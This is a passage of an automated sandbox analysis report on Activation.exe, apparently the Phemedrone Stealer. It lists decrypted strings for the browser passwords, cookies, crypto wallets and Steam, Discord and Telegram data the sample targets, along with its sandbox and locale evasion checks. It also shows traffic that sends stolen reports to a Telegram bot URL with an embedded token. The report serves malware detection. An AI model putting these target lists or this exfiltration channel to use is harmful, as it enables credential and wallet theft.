Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: formhistory.sqlite
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: moz_formhistory
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: logins.json
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: encryptedUsername
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: encryptedPassword
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: hostname
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: [^ -]
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: 1
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: metaData
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: password
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: 2A864886F70D010C050103
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: ISO-8859-1
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: password-check
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: 2A864886F70D01050D
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: nssPrivate
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: -
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: *.ini
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: global-salt
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Version
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: CryptoWallets
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: wallet.dat
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Wallets/
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Armory
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Atomic
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: atomic\Local Storage\leveldb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Bytecoin
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: bytecoin
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Coninomi
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Coinomi\Coinomi\wallets
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Jaxx
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: 0.2.Activation.exe.ce0000.0.unpack String decryptor: Electrum\wallets
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Exodus\exodus.wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Guarda
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Guarda\Local Storage\leveldb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ZCash
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Zcash
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla\recentservers.xml
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla\sitemanager.xml
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileZilla\
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FTP/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Steam
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *ssfn*
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: \config
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *.vdf
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Steam/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Software\Valve\Steam
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Apps
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Name
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Unknown
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Name:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GameID:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Steam/Games.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: HKEY_CURRENT_USER\Software\Valve\Steam
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SteamPath
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Discord
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *cord*
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Telegram
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: HKEY_CLASSES_ROOT\tg\DefaultIcon
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: tdata
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: s
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Messengers/Telegram/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FileGrabber
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Information
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ,d88b.d88b, 88888888888 Phemedrone Stealer `Y8888888Y' {0:dd/MM/yyyy HH:mm:ss} `Y888Y' Developed by https://t.me/webster480 & https://t.me/TheDyer `Y' Tag: {1} ----- Geolocation Data -----{2,-25}{3}{4,-25}{5} ({6}){7,-25}{8}{9,-25}{10}{11,-25}{12} ----- Hardware Info -----{13,-25}{14}\{15} {16,-25}{17} {18}{19,-25}{20}{21,-25}{22}{23,-25}{24}{25,-25}{26}{27,-25}{28} GB ----- Report Contents -----{29,-25}{30}{31,-25}{32}{33,-25}{34}{35,-25}{36}{37,-25}{38}{39,-25}{40}{41,-25}{42}{43}{44} ----- Miscellaneous -----{45,-25}{46}{47,-25}{48}{49,-25}{50}
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: IP:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ip
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Country:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: country
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: country_code
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: City:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: city
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Postal:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: asn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MAC:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Username:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Windows name:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: x32
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: x64
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Hardware ID:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Screen Resolution:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GPU:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: {0,-25}
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CPU:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: RAM:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Passwords:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Cookies:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Credit Cards:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: AutoFills:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Extensions:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Wallets:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Files:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: {0,-25}{1}
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Passwords Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Cookies Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Antivirus products:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ,
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: File Location:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: unknown
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Clipboard text:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Information.txt
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: *Phemedrone Stealer Report* \| by @webster480 & @TheDyer``` - IP: {0} \({1}\) - Tag: {2} {3} - Passwords: {4} - Cookies: {5} - Wallets: {6}```{7}{8}@freakcodingspot
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: \.
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: (
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: )
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Passwords Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Cookies Tags:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ]
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: -Phemedrone-Report.zip
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: [UNKNOWN]0.0.0.0-Phemedrone-Report.zip
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: x
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: https://get.geojs.io/v1/ip/geo.json
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: root\SecurityCenter2
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: SELECT * FROM AntivirusProduct
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: displayName
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: X2
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: :
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: SELECT * FROM Win32_VideoController
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: SELECT * FROM Win32_Processor
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: SELECT * FROM Win32_ComputerSystem
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: TotalPhysicalMemory
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: 0
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Win32_Processor
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ProcessorId
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Win32_DiskDrive
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: SerialNumber
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: SELECT * FROM
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: UNKNOWN
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ProductName
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Screenshot
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: user32.dll
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: GetDC
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: gdi32.dll
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: GetDeviceCaps
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Screenshot.png
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: file
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: filename
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: filedescription
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: POST
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ----------------------------
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: multipart/form-data; boundary=
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: --
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Content-Disposition: form-data; name="
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: "; filename="
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: "
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Content-Type: application/octet-stream
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: .phem
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: https://api.telegram.org/bot{0}/sendDocument
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: document
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: chat_id
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: parse_mode
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: MarkdownV2
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: caption
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: wireshark
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: httpdebbugerui
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: mtmproxy
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: sniffer
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: VirtualBox
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: VBox
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: VMware Virtual
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: VMware
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Hyper-V Video
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Microsoft
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ru-RU
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: kk-KZ
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ro-MD
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: uz-UZ
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: be-BY
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: az-Latn-AZ
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: hy-AM
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: ky-KG
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: tg-Cyrl-TJ
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Account ID:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Token:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Browser:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Value:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: URL:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Username:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Password:
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: v
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: (
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: Number: {0}Placeholder: {1}Expiration: {2}/{3}Browser: {4} v{5} ({6})
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: *.ldb
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: encrypted_key
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: DPAPI
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: CHEATS
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: celka.
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: nursultan.
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: xone
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: akrien
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: interium
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: nixware
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: skeet
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: GAMES
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: roblox.com.
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: genshin
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: minecraft.net
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: epicgames.com
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: steampowered.com
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: BANK
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: tinkoff
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: sberbank
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: MONEY
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: yoomoney
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: amazon
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: funpay
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: americanexpress
            Source: 0.2.Activation.exe.ce0000.0.unpack | String decryptor: CRYPTO
            Source: unknown | HTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.9:49739 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49746 version: TLS 1.2
            Source: Binary string: System.Xml.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: HPHo,C:\Windows\System.pdb source: Activation.exe, 00000000.00000002.1645404055.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Configuration.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdb source: Activation.exe, 00000000.00000002.1659436723.00000000061DD000.00000004.00000020.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.pdbL0Tw# source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbTV source: Activation.exe, 00000000.00000002.1645685696.0000000000A85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb\ source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Xml.pdb;( source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: mscorlib.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Management.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Activation.exe, 00000000.00000002.1650751818.0000000000D08000.00000040.00000001.01000000.00000003.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.ni.pdb source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Drawing.pdbh source: WER8CD2.tmp.dmp.5.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER8CD2.tmp.dmp.5.dr

            Networking

            Source: Network traffic | Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.9:49746 -> 149.154.167.220:443
            Source: unknown | DNS query: name: api.telegram.org
            Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1
                Host: get.geojs.io
                Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox View | IP Address: 104.26.1.100 104.26.1.100
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global traffic | HTTP traffic detected: POST /bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                Content-Type: multipart/form-data; boundary=----------------------------8dd1443b4c42cee
                Host: api.telegram.org
                Content-Length: 710510
                Expect: 100-continue
                Connection: Keep-Alive
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1
                Host: get.geojs.io
                Connection: Keep-Alive
            Source: global traffic | DNS traffic detected: DNS query: get.geojs.io
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: unknown | HTTP traffic detected: POST /bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                Content-Type: multipart/form-data; boundary=----------------------------8dd1443b4c42cee
                Host: api.telegram.org
                Content-Length: 710510
                Expect: 100-continue
                Connection: Keep-Alive
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgd
            Source: Activation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://get.geojs.io
            Source: Activation.exe, 00000000.00000002.1654044812.00000000035C4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://get.geojs.iod
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.teleLR
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocument
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendDocumentd
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geoj8
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io
            Source: Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/TheDyer
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/freakcodingspot
            Source: Activation.exe, 00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000362C000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.0000000003514000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1654044812.000000000361E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/webster480
            Source: Activation.exe, 00000000.00000002.1655462296.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, Activation.exe, 00000000.00000002.1655462296.00000000046BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
